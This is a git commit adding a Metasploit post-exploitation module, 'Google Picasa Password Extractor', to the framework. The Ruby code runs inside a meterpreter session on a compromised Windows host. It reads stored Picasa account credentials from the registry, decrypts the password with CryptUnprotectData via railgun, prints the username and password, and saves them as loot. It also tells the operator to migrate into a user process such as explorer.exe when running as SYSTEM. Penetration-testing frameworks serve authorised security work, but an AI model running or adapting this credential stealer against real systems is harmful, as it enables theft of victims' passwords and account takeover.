Adds Google Picasa Password Extractor Post module
git-svn-id: file:///home/svn/framework3/trunk@13643 4d416f70-5f16-0410-b530-b9f4589650daunstable
David Rude
parent
ab11d3e3eb
commit
052feebc29
|
|
@ -0,0 +1,160 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/post/windows/registry'
|
||||
require 'msf/core/post/windows/priv'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Post::Windows::Registry
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'Google Picasa Password Extractor',
|
||||
'Description' => %q{This module extracts and decrypts the login passwords
|
||||
stored by Google Picasa.},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'SecurityXploded Team', #www.SecurityXploded.com
|
||||
'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'Platform' => [ 'windows' ],
|
||||
'SessionTypes' => [ 'meterpreter' ]
|
||||
))
|
||||
end
|
||||
|
||||
|
||||
def prepare_railgun
|
||||
rg = session.railgun
|
||||
if (!rg.get_dll('crypt32'))
|
||||
rg.add_dll('crypt32')
|
||||
end
|
||||
|
||||
if (!rg.crypt32.functions["CryptUnprotectData"])
|
||||
rg.add_function("crypt32", "CryptUnprotectData", "BOOL", [
|
||||
["PBLOB","pDataIn", "in"],
|
||||
["PWCHAR", "szDataDescr", "out"],
|
||||
["PBLOB", "pOptionalEntropy", "in"],
|
||||
["PDWORD", "pvReserved", "in"],
|
||||
["PBLOB", "pPromptStruct", "in"],
|
||||
["DWORD", "dwFlags", "in"],
|
||||
["PBLOB", "pDataOut", "out"]
|
||||
])
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def decrypt_password(data)
|
||||
rg = session.railgun
|
||||
pid = client.sys.process.getpid
|
||||
process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
|
||||
|
||||
mem = process.memory.allocate(512)
|
||||
process.memory.write(mem, data)
|
||||
|
||||
if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
|
||||
addr = [mem].pack("V")
|
||||
len = [data.length].pack("V")
|
||||
ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
|
||||
len, addr = ret["pDataOut"].unpack("V2")
|
||||
else
|
||||
addr = [mem].pack("Q")
|
||||
len = [data.length].pack("Q")
|
||||
ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
|
||||
len, addr = ret["pDataOut"].unpack("Q2")
|
||||
end
|
||||
|
||||
return "" if len == 0
|
||||
decrypted_pw = process.memory.read(addr, len)
|
||||
return decrypted_pw
|
||||
end
|
||||
|
||||
def get_registry
|
||||
psecrets = ""
|
||||
|
||||
begin
|
||||
print_status("Looking in registry for stored login passwords by Picasa ...")
|
||||
|
||||
username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
|
||||
'GaiaEmail')
|
||||
password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
|
||||
'GaiaPass')
|
||||
|
||||
if username != nil and password != nil
|
||||
passbin = [password].pack("H*")
|
||||
pass = decrypt_password(passbin)
|
||||
|
||||
if pass != nil
|
||||
print_status("Username: #{username}")
|
||||
print_status("Password: #{pass}")
|
||||
secret = "#{username}:#{pass}"
|
||||
psecrets << secret
|
||||
end
|
||||
end
|
||||
|
||||
#For early versions of Picasa3
|
||||
username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
|
||||
'GaiaEmail')
|
||||
password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
|
||||
'GaiaPass')
|
||||
|
||||
if username != nil and password != nil
|
||||
passbin = [password].pack("H*")
|
||||
pass = decrypt_password(passbin)
|
||||
|
||||
if pass != nil
|
||||
print_status("Username: #{username}")
|
||||
print_status("Password: #{pass}")
|
||||
|
||||
secret = "#{username}:#{pass}"
|
||||
psecrets << secret
|
||||
end
|
||||
end
|
||||
|
||||
# store the loot
|
||||
if psecrets != ""
|
||||
path = store_loot(
|
||||
"picasa.decrypted",
|
||||
"text/plain",
|
||||
session,
|
||||
psecrets,
|
||||
"decrypted_picasa_data.txt",
|
||||
"Decrypted Picasa Passwords")
|
||||
|
||||
print_status("Decrypted passwords saved in: #{path}")
|
||||
end
|
||||
|
||||
rescue ::Exception => e
|
||||
print_error("An error has occured: #{e.to_s}")
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
uid = session.sys.config.getuid #Decryption only works in context of user's account.
|
||||
|
||||
if is_system?
|
||||
print_error("This module is running under #{uid}.")
|
||||
print_error("Automatic decryption will not be possible.")
|
||||
print_error("Migrate to a user process to achieve successful decryption (e.g. explorer.exe).")
|
||||
else
|
||||
prepare_railgun
|
||||
get_registry()
|
||||
end
|
||||
|
||||
print_status("Done")
|
||||
end
|
||||
end
|
||||
Loading…
Reference in New Issue